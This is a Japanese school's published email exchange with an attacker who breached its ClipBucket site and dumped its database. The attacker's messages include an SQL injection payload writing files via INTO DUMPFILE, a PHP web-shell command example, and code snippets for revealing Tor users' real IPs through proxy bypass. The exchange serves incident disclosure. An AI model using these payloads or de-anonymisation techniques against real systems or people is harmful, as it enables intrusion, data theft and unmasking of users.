犯人とのメールやり取り一部始終

憎き犯人との間にどの様なやり取りがあったのかそのメールの全てを公開致します。

※尚、犯人に譲歩したり、仲間になる様に仕向ける様な口調につきまして誤解のない様に申し上げておきますが、犯行声明メールが届いた時点ではまだ、この人物が犯人と確定された訳ではありませんでしたし、Tor経由のメールであった為に警戒されて連絡が取れなくなる事を危惧した為に行なった発言であり、学院としての信条は逮捕であります。既に関係個所への通報・相談は行なっており公開に支障がないと判断致しましたので公開に踏み切りました。

ピンクで囲った発言が犯人で、白が白Zでございます。

大変ご迷惑をおかけしました。
私がやりました。

正直に言って頂ければ大げさな事にはしませんので、
どの様にやったのか正確に提示して下さい。

この度は8946ユーザーの皆様、
そして白Z様に多大なるご迷惑をおかけしまして申し訳ございませんでした
・PostgreSQLに第三者が接続できる
・Clipbucketに脆弱性が残っている
この二つが発端となり、データベース奪取へと繋がりました
Clipbucketの脆弱性->MySQL->cacheディレクトリにスクリプト展開
->ファイルのリストアップ->bbsのconfig.phpからユーザー名・パスワードを取得->スクリプトの自己削除
->PostgreSQLに接続->データーベースのダンプと削除
まずは、不必要なサービス(PostgreSQL)へ外部から接続できないようにしてください
次に、Clipbucketのバージョンアップを
最後に/var/www/hackerschool.jp/以下のファイル・ディレクトリのパーミッションをより限定的なものに変更してください
DB削除前のバックアップがあります、必要であれば添付します
お騒がせしました

確認しました。
データベースのバックアップがあれば、お願いします。
こちらで、リストアします。
あと、利用したスクリプトファイルを参考までにいただけますか?
Clipbucketの脆弱性->MySQL->cacheディレクトリにスクリプト展開
この個所、具体的な手順を教えていただけますか?
今後、この件をふまえ、教訓にさせていただきます。

バックアップを添付しました
現在のDBを再度バックアップした後にお試しください
あと、利用したスクリプトファイルを参考までにいただけますか?
残念ながらバックアップ以外は全て破棄しました
shell_execを利用したPHP Shellです
http://php.net/manual/ja/function.shell-exec.php
Clipbucketの脆弱性->MySQL->cacheディレクトリにスクリプト展開
この個所、具体的な手順を教えていただけますか?
追って連絡します

最新のバックアップあります
このメール届いていますか

はい。届いています。
手順付きで答えていただkないと何も解決致しません。

検証したところSF.netで配布されている最新バージョン、clipbucket-2.6-r738.zipにも脆弱性がありました
修正されていないようです
絶対に使用しないでください!
以上

具体的にはどの部分でしょうか?

スクリプトの展開
view_channel.php?user=-1′ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL INTO DUMPFILE ‘/var/www/’#
ClipBucket 2.6 Revision 738 Multiple SQL Injection Vulnerabilities
http://www.exploit-db.com/exploits/23252/
正誤
○「→修正されていない←」
×「最新版にも脆弱性」

確認しました。
ログをみるかぎり、
files/logs/のフォルダに、tmpuawju.php というファイルをアップしてますよね?
このファイルが何をしたのか知りたいので、
ファイルをいただけますか?
消されたのであれば、再現お願いします。

消されたのであれば、再現お願いします。
PHP Shellです
一行バージョン

リクエスト : http://hoge.com/hoge.php?cmd=uname
レスポンス : Linux
リクエスト : http://hoge.com/hoge.php?cmd=whoami
レスポンス : apache

WhitehackerZ様
連絡先が変わりましたので、変更をお願いします
何かあればこちらまで
hc4czw32@tormail.org

メールアドレス変更の件、了解しました。
あと、やはりログに見当たらないので、Linuxコマンドで具体的にファイルを指
定(特定)して、中身を閲覧した過程と方法を教えてもらますか?

大事にはしない->報奨金とは、酷い話ですね

状況を考えて下さい。
約束は守ります。
しかし、犯人追及を辞めると自作自演を疑われかねない事はご理解頂けませんか?
今回の様な被害受けて警察などに届け出しない会社は普通は決してない事ですから
我々が疑われます。

御返事は頂けないのでしょうか?
明日午前中いっぱいまでに何らかの御返事頂けないようでしたら、
事後処理放棄とみなしそれなりの対処させて頂きます。

できれば月曜日の午前中までにお願いします。
御返事は頂けないのでしょうか?
明日午前中いっぱいまでに何らかの御返事頂けないようでしたら、
事後処理放棄とみなしそれなりの対処させて頂きます。
月曜日の午前中では?
勝手に予定を変えられては困ります
生IPを取得できる(可能性がある)メソッド 5+α
気に入っていただけると信じています
– メソッド1
Adobe Flash Player
Flash Playerは串に非対応
「Flashのロード->リクエストを送信」で生IPを取得できる
http://help.adobe.com/ja_JP/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b8f6c0-7ffe.html
http://forums.adobe.com/message/4262734
http://forums.adobe.com/thread/685245
– メソッド2
Oracle Java
Javaはブラウザに設定された串を使用できるが、
串を使用せずにリクエストを送信することもできる
「アプレットのロード->リクエストを送信」で生IPを取得できる
http://www.rgagnon.com/javadetails/java-0085.html
メソッド3
Microsoft Silverlight
SilverlightのHTTPクライアントはブラウザに設定された串を使用するが、
ソケットクラスを使用すれば串をbypassできる
メソッド1と2のように生IPを取得できる
System.Net.Sockets
http://msdn.microsoft.com/en-us/library/system.net.sockets(v=vs.95).aspx
Silverlight 2 and System.Net.Sockets.Socket
http://weblogs.asp.net/mschwarz/archive/2008/03/07/silverlight-2-and-sockets.aspx
– メソッド4
WebSocket
実装によってはブラウザの串の設定を無視することもある
串の設定を無視するような実装であれば生IPを取得できる
FirefoxのWebSocketでDNS漏れ
https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs
http://www.html5rocks.com/ja/tutorials/websockets/basics/
http://ja.wikipedia.org/wiki/WebSocket
– メソッド5
SSL
ブラウザの設定によっては、SSLを使用した接続のとき串を通さないことがある
サイト全体をSSL接続にすることが不可能な場合は、
0pxの画像をページに入れると生IPを取得できる

– メソッド6
TorDNSELを利用してアク禁
悪意を持つユーザーにTorを悪用させない最も有効な手段
アク禁
https://www.torproject.org/projects/tordnsel.html.en

有難うございます。
勇み足だった事は認めますが、貴方の直接の連絡先も知りませんし、
7時間も返信(私からのメールを見たのか見てないのか)なければ
放棄したのか?ぐらい考えてしまいます。
逆の立場でそう感じませんかね?

確認しましたが、全部英語でわかりません。各々詳細解説お願いします。

説明は難しいのでしょうか?
何かしらの御返事もらえませんか?

ソースコード貼ります
ブログに掲載するならソースコード付で十分
この件(Tor解析)で補償は終了 メソッド1~5の質問だけ答えます
約束の通り、おおごとにしない(司法機関・IPAなど外部への情報提供をしない)こと
– メソッド1
Adobe Flash Player
Flash Playerは串に非対応
「Flashのロード->リクエストを送信」で生IPを取得できる
ActionScript
var urlRequest:URLRequest = new URLRequest();
urlRequest.url = “http://example.com/log”;
var urlLoader:URLLoader = new URLLoader();
urlLoader.load(urlRequest);
– メソッド2
Oracle Java
Javaはブラウザに設定された串を使用できるが、
串を使用せずにリクエストを送信することもできる
「アプレットのロード->リクエストを送信」で生IPを取得できる
Java
URL url = new URL(“http://anonymouse.com/log”);
URLConnection conn = url.openConnection(Proxy.NO_PROXY);
– メソッド3
Microsoft Silverlight
SilverlightのHTTPクライアントはブラウザに設定された串を使用するが、
ソケットクラスを使用すれば串をbypassできる
メソッド1と2のように生IPを取得できる
Silverlight + C#
var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
var socketAsyncEventArgs = new SocketAsyncEventArgs();
socketAsyncEventArgs.RemoteEndPoint = new DnsEndPoint(“anonymouse.com”, 80);
socket.ConnectAsync(socketAsyncEventArgs);
– メソッド4
WebSocket
実装によってはブラウザの串の設定を無視することもある
串の設定を無視するような実装であれば生IPを取得できる
JavaScript
socket = new WebSocket(“ws://h0lnugtzsrpbx1wj.anonymouse.com:8800/log”);
socket.send(‘test’);
FirefoxのWebSocketでDNS漏れ
https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs
– メソッド5
SSL
ブラウザの設定によっては、SSLを使用した接続のとき串を通さないことがある
サイト全体をSSL接続にすることが不可能な場合は、
0pxの画像をページに入れると生IPを取得できる

– メソッド6
TorDNSELを利用してアク禁
悪意を持つユーザーにTorを悪用させない最も有効な手段
アク禁
https://www.torproject.org/projects/tordnsel.html.en

はっ?
貴方にそんな上から目線で発言される覚えはないですし、
貴方からこれにて終了と言われる覚えはないのですが?
ふざけているのですか?
全員にノベルティおくったり(これだけでも数十万)
商談保留にされて、じゃあ警察等に行かない代わりに貴方お金の保障してもらえますか?
優しく寛大にせっしていればつけあがるなら約束保護にさせてもらいます。
貴方はちょこちょこっと数回メールした程度ですまされる範囲だとおもうのですか?

まだ何も終わってないのですが?今後の事は何もまだ話し合いが出来てませんが?これにて終了と貴方がいう問題ではありませんよね?我々にとってメリットがなければ一方的に損害が出てる状況で終焉はありえませんよ?

前回のメールから20時間経過しようとしてますがこのままであれば逃走を図ったとみなし約束破棄します。最終警告です。

犯人のツイッターアカウント
hanninn01

犯人とのツイッター上でのやり取りはこちら

http://togetter.com/li/458743